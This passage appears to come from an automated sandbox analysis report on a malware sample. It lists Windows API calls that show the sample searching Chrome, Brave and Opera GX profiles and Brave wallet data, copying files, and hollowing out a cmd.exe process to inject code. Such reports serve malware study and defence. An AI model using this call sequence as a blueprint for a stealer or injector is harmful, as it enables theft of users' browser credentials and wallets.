                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                        • API String ID: 956187361-332874205
                                                                                                                                                                        • Opcode ID: 5b465b6ecbbaef82e6b6ce0d9d2f77677227d8efbca7cb22584214c157db25a1
                                                                                                                                                                        • Instruction ID: b1fda84b196762db4b5f906c448288c69ba3195abc43cd2c2c47e466a0c9f56a
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b465b6ecbbaef82e6b6ce0d9d2f77677227d8efbca7cb22584214c157db25a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EC11C72D0022AAFDF22AB64EC459EE777DAF18304F0544A6FA09B3151DB359F858F50
                                                                                                                                                                        Function 00189CF1 Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001B67F2,001B67EF,001B731C,001B67EE,?,?,?), ref: 00189D9B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7320), ref: 00189DBC
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7324), ref: 00189DD6
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,001B7328,?,001B67F3), ref: 00189E68
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Brave,001B7348,001B734C,001B7328,?,001B67F3), ref: 00189FEA
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0018A004
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018A0C4
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018A193
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018A1D1
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018A23B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0018CCBE), ref: 0018A24E
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018A331
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018A3F1
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0018A496
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018A4F7
                                                                                                                                                                          • Part of subcall function 00188DAC: lstrlenA.KERNEL32(?), ref: 00188FA5
                                                                                                                                                                          • Part of subcall function 00188DAC: lstrlenA.KERNEL32(?), ref: 00188FC0
                                                                                                                                                                          • Part of subcall function 0018951A: lstrlenA.KERNEL32(?), ref: 00189943
                                                                                                                                                                          • Part of subcall function 0018951A: lstrlenA.KERNEL32(?), ref: 0018995E
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018A528
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018A5E8
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018A67F
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018A743
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018A757
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                        • API String ID: 4173076446-1189830961
                                                                                                                                                                        • Opcode ID: a5c6708c594dd2f02ade6c93e1a85515e160d329bee6b0a36ac9e4f603b787d9
                                                                                                                                                                        • Instruction ID: 07dfa4fc35340fda2b81b7fa8eb573c97cc285582cfa5bc99df27967ded48e7c
                                                                                                                                                                        • Opcode Fuzzy Hash: a5c6708c594dd2f02ade6c93e1a85515e160d329bee6b0a36ac9e4f603b787d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B42D4329001299FDF62BB24ED46ADD77B4AF28304F4541E1F908B7162DB74AF998F81
                                                                                                                                                                        Function 00196013 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                        • API String ID: 2178766154-445461498
                                                                                                                                                                        • Opcode ID: 27735559bfb48da9287d526a8cd59a7ae3fc043cea796b4c773b8c6c6164f3d1
                                                                                                                                                                        • Instruction ID: 64275d2e5cf7c8d224275fc1dacaaae6d6bbd306d4b58079a7bad6c2dccd003f
                                                                                                                                                                        • Opcode Fuzzy Hash: 27735559bfb48da9287d526a8cd59a7ae3fc043cea796b4c773b8c6c6164f3d1
                                                                                                                                                                        • Instruction Fuzzy Hash: B281137290022D9BCF62FB64EC45ADD7BB8FB18304F0585E6E549A3111DF35AA898F90
                                                                                                                                                                        Function 00195B4D Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00195B72
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00195B79
                                                                                                                                                                        • wsprintfA.USER32 ref: 00195B92
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00195BA9
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6AA0), ref: 00195BCA
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6AA4), ref: 00195BE4
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 00195CC8
                                                                                                                                                                          • Part of subcall function 0019584D: _memset.LIBCMT ref: 00195885
                                                                                                                                                                          • Part of subcall function 0019584D: _memset.LIBCMT ref: 00195896
                                                                                                                                                                          • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 001958C1
                                                                                                                                                                          • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 001958DF
                                                                                                                                                                          • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 001958F3
                                                                                                                                                                          • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00195906
                                                                                                                                                                          • Part of subcall function 0019584D: StrStrA.SHLWAPI(00000000), ref: 001959AA
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00195CEB
                                                                                                                                                                        • wsprintfA.USER32 ref: 00195C0B
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00195D1A
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00195D2E
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195D5C
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195D6F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00195D7B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00195D98
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                        • String ID: %s\%s$%s\*
                                                                                                                                                                        • API String ID: 2636950706-2848263008
                                                                                                                                                                        • Opcode ID: 7b93b915f506e5e8db5197b8e6ac540971ff82042fa478118d8cb70e9753c1c3
                                                                                                                                                                        • Instruction ID: eef1073b2e1d1b3556a9e5781e25f01a1753bfa736cfb164944db1ac8dec6378
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b93b915f506e5e8db5197b8e6ac540971ff82042fa478118d8cb70e9753c1c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 28713AB19002289BDF22FB60EC49ADD7BBDAF19300F0004E6E609A7151EB71AF85CF55
                                                                                                                                                                        Function 0018F51F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018F551
                                                                                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,001B65A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0018F575
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0018F587
                                                                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0018F599
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0018F5B7
                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0018F5CD
                                                                                                                                                                        • ResumeThread.KERNEL32(?), ref: 0018F5DD
                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,00192DA1,?,00000000), ref: 0018F5FC
                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0018F632
                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,D6D9E8F4,00000004,00000000), ref: 0018F659
                                                                                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 0018F66B
                                                                                                                                                                        • ResumeThread.KERNEL32(?), ref: 0018F674
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                        • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                        • API String ID: 3621800378-4087486346
                                                                                                                                                                        • Opcode ID: faeb5a2e586254a92e481e6227a77d26aa02b9ee0358619ee71f877bd898ecaf
                                                                                                                                                                        • Instruction ID: 8b919b3719b59faf734853dca6eea49ede0afbeebc51726baa01c7f34f0dc92c
                                                                                                                                                                        • Opcode Fuzzy Hash: faeb5a2e586254a92e481e6227a77d26aa02b9ee0358619ee71f877bd898ecaf
                                                                                                                                                                        • Instruction Fuzzy Hash: 38413972A00208AFDB11AFA4DC85FEEBBB9FF48745F104069FA05E6161D771AE50CB20
                                                                                                                                                                        Function 00181D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001BA9AC,001BA9B0,001B69F3,001B69F2,0019794A,?,00000000), ref: 00181FA4
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001BA9B4), ref: 00181FD7
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001BA9B8), ref: 00181FF1
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001BA9BC,001BA9C0,?,001BA9C4,001B69F6), ref: 001820DD
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 001822C3
